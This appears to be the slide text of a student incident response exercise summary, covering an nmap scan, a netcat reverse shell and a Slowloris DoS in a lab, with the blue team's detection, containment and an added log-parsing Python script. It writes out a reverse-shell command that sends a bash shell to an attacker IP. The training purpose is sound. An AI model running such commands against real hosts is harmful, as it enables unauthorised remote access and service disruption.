
RightPoint

Incident Response
Team Exercise (IRTx)
Project Summary and Evaluation

Luke Fincher
Mohamed Jaber
Sam Prevett
Jake Seung Nam
Phillip Wood
Red Team attacks demonstrated:
1 - port scan (nmap)
2 - reverse shell (netcat)
3 - DDoS (Slowloris)

Attack 1 - port scan (nmap)
Initial Nmap scan is successful.
Initiating PortSentry: /etc/init.d/portsentry start
Checking status via logs: journalctl -u portsentry
After PortSentry is activated, the attacker is unable to perform an Nmap scan.
Monitoring logs: journalctl -u portsentry
PortSentry automatically appends the attacker to /etc/hosts.deny.
PortSentry log data is written to a text file as evidence.
The PortSentry history file is automatically appended with a timestamped entry of the first attempted scan from the attacking machine.
PortSentry service stopped so it would not impact the next attacks.
Attack 2 - reverse shell (netcat)
SSH service status confirmed active: systemctl status ssh
User with weak password added to host; this simulates a plausible vulnerability to brute-force unauthorised access.
Open a listener on port 4444 with netcat to receive the reverse shell.
SSH with the guessed credentials into 192.168.1.5.
Start the reverse shell: nc 192.168.1.9 4444 -e /bin/bash
Using the reverse shell from the listening attacker machine, 192.168.1.9.
Blue Team monitoring of SSH logs: journalctl -u ssh
SSH session opened for vulnerable_fool from a suspicious IP address.
Investigate running processes by PID and by user.
Containment: kill all processes associated with vulnerable_fool.
Connection ended because the Blue Team killed the SSH and shell processes.
Manually configure access to the attacked host: only allow SSH from Blue Team IP addresses.
Set all SSH connections to be denied by default in /etc/hosts.deny; any host not explicitly included in /etc/hosts.allow is now denied.
Failed attempt to reconnect via SSH after the Blue Team protections.
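To show how the Blue Team's detection and containment steps for attack 2 could be scripted, here is an added example (not one of the exercise deliverables) that parses constructed journalctl -u ssh lines for accepted logins from outside a Blue Team allowlist, reports the sshd PID to kill, and generates the matching deny-by-default /etc/hosts.allow and /etc/hosts.deny entries. The Blue Team range 192.168.1.16/28, the host name "target" and the log lines are assumptions.

```python
"""Flag SSH logins from outside the Blue Team allowlist and build TCP wrapper rules (attack 2)."""
import re
from ipaddress import ip_address, ip_network

# Constructed sample of `journalctl -u ssh` output; not captured during the exercise.
SAMPLE_LOG = """\
Mar 01 10:02:11 target sshd[1201]: Accepted password for vulnerable_fool from 192.168.1.9 port 51234 ssh2
Mar 01 10:02:11 target sshd[1201]: pam_unix(sshd:session): session opened for user vulnerable_fool by (uid=0)
Mar 01 10:05:40 target sshd[1300]: Accepted publickey for blueadmin from 192.168.1.20 port 40011 ssh2
Mar 01 10:06:02 target sshd[1333]: Failed password for root from 192.168.1.9 port 51240 ssh2
"""

# Assumed Blue Team range; the slides only say "Blue Team IP addresses".
BLUE_TEAM_NETS = [ip_network("192.168.1.16/28")]

# Matches sshd's "Accepted <method> for <user> from <ip> port <port>" line.
LOGIN_RE = re.compile(
    r"sshd\[(?P<pid>\d+)\]: Accepted (?P<method>\w+) for (?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port (?P<port>\d+)"
)

def is_blue_team(ip: str) -> bool:
    """True if the address lies inside one of the allowlisted Blue Team networks."""
    addr = ip_address(ip)
    return any(addr in net for net in BLUE_TEAM_NETS)

def suspicious_logins(log_text: str) -> list:
    """Accepted logins whose source is outside the allowlist, with the sshd PID to kill."""
    hits = []
    for line in log_text.splitlines():
        m = LOGIN_RE.search(line)
        if m and not is_blue_team(m["ip"]):
            hits.append({"pid": int(m["pid"]), "user": m["user"],
                         "ip": m["ip"], "method": m["method"]})
    return hits

def tcp_wrapper_rules() -> tuple:
    """Deny-by-default rules: sshd allowed only from Blue Team nets (hosts.allow), all else denied."""
    nets = ", ".join(f"{n.network_address}/{n.netmask}" for n in BLUE_TEAM_NETS)
    return f"sshd: {nets}\n", "sshd: ALL\n"

if __name__ == "__main__":
    for hit in suspicious_logins(SAMPLE_LOG):
        print(f"ALERT: {hit['user']} from {hit['ip']} ({hit['method']}), sshd pid {hit['pid']}")
    allow, deny = tcp_wrapper_rules()
    print("/etc/hosts.allow:\n" + allow + "/etc/hosts.deny:\n" + deny)
```

Only "Accepted" lines count as sessions; the failed root attempt from the same address is left for a separate brute-force rule.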
Attack 3 - DDoS (Slowloris)
Server: python3 -m http.server --bind 192.168.1.5 8080
Attack it with Slowloris.
The running webserver outputs error messages to its shell.
Wireshark is used to capture TCP packets for evidence and analysis.
The best defence is to logically partition the network with VLANs.
Configure the Cisco switch (via the console line) with a new VLAN 60.
VLAN 60 is assigned to the port interface connected to the webserver.
Restrict the port to access mode to deny communication from outside VLAN 60.
The attacking machine can no longer communicate with Blue Team machines at all.
Luke Fincher
Introduction
Objectives & Target Validation
Individual Team Member Achievements
Lessons Learned
Phillip Wood
Project Appraisal
Lessons Learned
Mohammed Jaber
Incident/Event Identification Strategy
Lessons Learned
Jake Seung Nam
The Efficacy of Communication
Lessons Learned
Sam Prevett
Recommendations for Enhancement
Lessons Learned
Conclusion
Q&A
Appendix
Contributions
Luke Fincher
Minutes + Agenda x1, AT3 Red Team document, Red team Playbook, Evaluation + negotiation plan +
CSO email Document, Performance evaluation form, Communication report, Exercise closure
report, the speech.

Phillip Wood
Minutes + Agenda x1, AT3 Blue Team document, Blue Team playbook, Evaluation + negotiation plan
+ CSO email Document, IRP Evaluation document (AT2 Part 2), Briefing report (AT1), the speech,
Project Management report.

Mohammed Jaber
Minutes + Agenda x1, AT3 Red Team document, Observer Checklist, Evaluation + negotiation plan +
CSO email Document, Statement of work, the slideshow, the speech.

Jake Seung Nam
Minutes + Agenda x1, AT3 Blue Team document, Rule of Engagement, Evaluation + negotiation plan
+ CSO email Document, the speech.

Sam Prevett
Minutes + Agenda x1, AT3 Blue Team document, Stakeholder status report, Evaluation + negotiation
plan + CSO email Document, Gantt chart, the speech.
